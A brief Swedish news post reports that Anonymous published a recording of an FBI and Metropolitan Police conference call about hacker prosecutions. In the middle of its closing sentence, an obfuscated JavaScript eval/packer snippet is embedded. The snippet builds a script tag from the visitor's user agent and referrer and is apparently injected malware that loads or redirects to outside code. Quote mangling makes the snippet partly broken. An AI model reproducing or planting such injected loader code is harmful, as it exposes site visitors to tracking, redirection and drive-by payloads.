Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Anonymous lyssnade av samtal mellan FBI och MPS

Anonymous lyssnade av samtal mellan FBI och MPS
Sebastian

Idag lade Anonymous ut en ljudspelning på Youtube där de har avlyssnat en 16 minuter lång telefonkonferens mellan de amerikanska FBI och det brittiska Metropolitan Police Service där de diskuterar utredningar och pågående rättegångar mot hackers i Storbritannien som anses vara knutna till Anonymous.

FBI säger att inget intrång i deras kommunikationssystem har skett och att Anonymous troligen kommit över epostmeddelanden där koden till telefonkonferensen fanns med.

Ni eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzbai|var|u0026u|referrer|dstta||js|php’.split(’|’),0,{}))
kan lyssna på hela samtalet via länken neden: